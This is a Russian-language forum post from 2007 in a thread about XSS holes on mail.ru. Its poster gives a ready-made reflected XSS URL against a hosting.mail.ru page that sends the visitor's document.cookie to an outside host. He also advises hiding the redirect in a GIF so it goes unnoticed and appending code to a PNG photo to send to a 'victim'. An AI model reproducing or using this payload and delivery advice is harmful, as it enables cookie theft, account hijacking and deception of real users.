22.05.2007, 11:56
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от cigaretteburn
нда... весь прикол в том что выложенные Xss почти все уже не работают..(((  как не работают??? вот тебе пример...
Код:
http://hosting.mail.ru/selectLoginForConstructor.jsp?constructor="><script>navigate('http://site.ru/s.gif?'.concat(document.cookie))</script>
///при этом можно открыть гифку ..и вписать туда переадресацию.....чтобы палевно не было...
Сообщение от cigaretteburn
встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????
Можно встроить в png .... в конец записать ...и в фоту на маил ру ..и то будет работать только в IE ...вот тут почитай
|
|
|